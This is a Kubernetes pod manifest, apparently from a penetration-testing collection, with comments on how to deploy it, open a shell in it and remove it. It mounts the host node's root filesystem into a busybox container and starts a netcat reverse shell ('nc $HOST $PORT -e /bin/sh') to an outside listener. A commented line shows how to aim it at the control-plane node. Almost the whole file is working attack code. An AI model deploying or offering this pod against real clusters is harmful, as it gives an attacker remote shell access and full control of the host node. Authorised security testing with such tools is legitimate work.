###########################################################
## Deploy: kubectl -n [namespace] apply -f pod-hostpath-revshell.yaml 
## Access: kubectl -n [namespace] exec -it pod-hostpath-revshell -- bash
## Remove: kubectl -n [namespace] delete pod-hostpath-revshell
###########################################################
apiVersion: v1
kind: Pod
metadata:
  name: pod-hostpath-revshell
  labels:
    app: pentest
spec:
  containers:
  - name: hostpath-revshell
    image: busybox
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "nc $HOST $PORT  -e /bin/sh;" ]
    #nodeName: control-plane-node-name # Uncomment and change to control node name to try and schedule pod on control-plane node
  volumes:
  - name: noderoot
    hostPath:
      path: /